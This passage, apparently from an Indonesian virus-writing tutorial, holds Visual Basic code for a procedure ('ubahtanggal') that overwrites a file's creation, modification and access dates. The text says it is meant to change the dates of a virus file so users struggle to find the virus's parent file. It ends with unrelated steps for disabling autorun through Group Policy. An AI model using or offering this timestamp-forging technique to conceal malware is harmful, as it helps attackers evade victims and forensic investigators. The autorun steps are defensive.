Public Declare Function OpenFile Lib "kernel32" (ByVal lpFileName As String, lpReOpenBuff
As OFSTRUCT, ByVal wStyle As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Const OF_READ = &H0
Public Const OF_READWRITE = &H2
Public Const OF_REOPEN = &H8000
70
Public Const OF_SHARE_COMPAT = &H0
Public Const OF_SHARE_DENY_NONE = &H40
Public Const OF_SHARE_DENY_READ = &H30
Public Const OF_SHARE_DENY_WRITE = &H20
Public Const OF_SHARE_EXCLUSIVE = &H10
Public Const OF_VERIFY = &H400
Public Const OF_WRITE = &H1
Public Const OFS_MAXPATHNAME = 128
Public Type OFSTRUCT
cBytes As Byte
fFixedDisk As Byte
nErrCode As Integer
Reserved1 As Integer
Reserved2 As Integer
szPathName(OFS_MAXPATHNAME) As Byte
End Type
Public Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Public Type SYSTEMTIME
wYear As Integer
wMonth As Integer
wDayOfWeek As Integer
wDay As Integer
wHour As Integer
wMinute As Integer
wSecond As Integer
wMilliseconds As Integer
End Type
Public Sub ubahtanggal(pathfil As String, hari As Long, bulan As Long, tahun As Long,
Optional creat As Boolean, Optional modif As Boolean, Optional acces As Boolean)
On Error Resume Next
Dim hfile As Long, rval As Long
Dim buff As OFSTRUCT
Dim ctime As FILETIME, latime As FILETIME, mtime As FILETIME
Dim stime As SYSTEMTIME
Dim fil As String
If IsMissing(creat) Then creat = False
If IsMissing(modif) Then modif = False
If IsMissing(acces) Then acces = False
hfile = OpenFile(pathfil, buff, OF_WRITE)
If hfile Then
rval = GetFileTime(hfile, ctime, latime, mtime)
If creat Then
rval = FileTimeToLocalFileTime(ctime, ctime)
rval = FileTimeToSystemTime(ctime, stime)
stime.wYear = tahun
stime.wMonth = bulan
stime.wDay = hari
stime.wHour = Hour(Time)
stime.wMinute = Minute(Time)
stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, ctime)
rval = LocalFileTimeToFileTime(ctime, ctime)
End If
If modif Then
rval = FileTimeToLocalFileTime(mtime, mtime)
rval = FileTimeToSystemTime(mtime, stime)
stime.wYear = tahun
stime.wMonth = bulan
stime.wDay = hari
71
stime.wHour = Hour(Time)
stime.wMinute = Minute(Time)
stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, mtime)
rval = LocalFileTimeToFileTime(mtime, mtime)
End If
If acces Then
rval = FileTimeToLocalFileTime(latime, latime)
rval = FileTimeToSystemTime(latime, stime)
stime.wYear = tahun
stime.wMonth = bulan
stime.wDay = hari
stime.wHour = Hour(Time)
stime.wMinute = Minute(Time)
stime.wSecond = Second(Time)
rval = SystemTimeToFileTime(stime, latime)
rval = LocalFileTimeToFileTime(latime, latime)
End If
rval = SetFileTime(hfile, ctime, latime, mtime)
End If
rval = CloseHandle(hfile)
End Sub
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Prosedur ubahtanggal akan merubah date dari file virus, dengan parameter hari,
bulan dan tahun sesuai dengan yang kita inginkan. Parameter creat, modif dan
acces menunjukkan date atau time mana yang akan diubah, Sebagai contoh bila
acces bernilai True dan lainnya bernilai False maka hanya date dan time acces
saja yang akan diubah.
$> End...
Karena keterbatasan tempat dan waktu maka saya hanya bisa membeberkan 2
teknik saja yang saya kira dapat digunakan untuk mempersulit User dalam
mencari File Induk dari Virus. Saya ingin memohon maaf apabila ada
ekurangan atau pernyataan yang menyinggung pembaca.


Disable autorun all drive(untuk mencegah autorun virus for XP)This is a featured


1.click start -> run
masukan "gpedit.msc" tanpa kutip and click ok
lalu keluar Group Policy
klik local computer->computer configuration->administrative template->System
double click turn off autoplay->jadikan enable and cd-rom drive jadikan all drives

2.click user configuration(cari aja di sebelah kiri)
klik administrative template->System
double click turn off autoplay->jadikan enable and cd-rom drive jadikan all drives

jika sudah, maka seluruh autorun, baik dari virus maupun drives lain tidak akan jalan, tp masih bisa dipake, begitu juga virusnya tidak akan langsung jalan. tapi kalo udah di double clik, baru deh jalan, hehehe


Narasumber.www.indocracker.wetpaint.com.